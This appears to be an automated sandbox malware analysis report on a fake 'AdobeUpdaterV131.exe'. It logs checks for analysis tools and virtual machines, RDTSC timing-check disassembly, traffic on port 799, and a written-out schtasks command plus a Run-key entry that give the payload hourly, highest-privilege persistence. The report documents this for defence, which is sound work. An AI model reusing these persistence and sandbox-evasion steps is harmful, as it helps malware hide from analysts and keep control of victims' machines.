Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window searched: window name: Regmonclass	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 799

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1636 second address: 8D1653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0D9C3E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1653 second address: 8D1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D180C second address: 8D1818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F09D0D9C3D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1818 second address: 8D181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D181C second address: 8D1822 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1822 second address: 8D182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D182C second address: 8D1830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1830 second address: 8D1836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1948 second address: 8D1966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F09D0D9C3E7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D1966 second address: 8D1970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4B30 second address: 8D4B75 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0D9C3E9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ebx 0x00000018 pushad 0x00000019 jnc 00007F09D0D9C3D6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4B75 second address: 8D4B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CB4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4B95 second address: 8D4BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0D9C3DBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4C3D second address: 8D4C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4E2F second address: 8D4E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4E34 second address: 8D4E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 711553B9h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F09D0731CA8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+1244899Dh] 0x00000030 sub dword ptr [ebp+122D19E0h], ecx 0x00000036 push eax 0x00000037 push edi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8D4E78 second address: 8D4E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F2B07 second address: 8F2B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F2B0B second address: 8F2B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F09D0D9C3DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F303B second address: 8F303F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F32F1 second address: 8F332B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e jmp 00007F09D0D9C3E0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F349A second address: 8F34B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F09D0731CB8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F34B9 second address: 8F34E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F09D0D9C3E3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F34E2 second address: 8F34F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F09D0731CA6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F3660 second address: 8F3664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8C86C3 second address: 8C86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F09D0731CB1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8C86D9 second address: 8C86FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F09D0D9C3EEh 0x00000008 jmp 00007F09D0D9C3E8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F43A0 second address: 8F43A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F43A6 second address: 8F43DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F09D0D9C3E1h 0x0000000c push ebx 0x0000000d jmp 00007F09D0D9C3DDh 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F09D0D9C3DFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F9CAA second address: 8F9CBD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F9CBD second address: 8F9CD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F9CD0 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F09D0731CB0h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007F09D0731CB0h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F84C7 second address: 8F84CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8F9DD3 second address: 8F9DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007F09D0731CA6h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F09D0731CA6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FC3DC second address: 8FC3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 js 00007F09D0D9C3FDh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FC3ED second address: 8FC3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD958 second address: 8FD970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD970 second address: 8FD976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD976 second address: 8FD980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD980 second address: 8FD984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD984 second address: 8FD98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD98A second address: 8FD9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F09D0731CB3h 0x0000000f pushad 0x00000010 jno 00007F09D0731CA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD9B0 second address: 8FD9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F09D0D9C3D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 8FD9BD second address: 8FD9C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9008C2 second address: 9008C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9008C6 second address: 9008CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9008CA second address: 9008D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 900FC8 second address: 900FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB2h 0x00000007 jc 00007F09D0731CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jno 00007F09D0731CA6h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 900FF2 second address: 900FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 900FF7 second address: 900FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 902BC2 second address: 902BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 902BC6 second address: 902BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903072 second address: 903076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 903076 second address: 90307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 90307C second address: 903082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
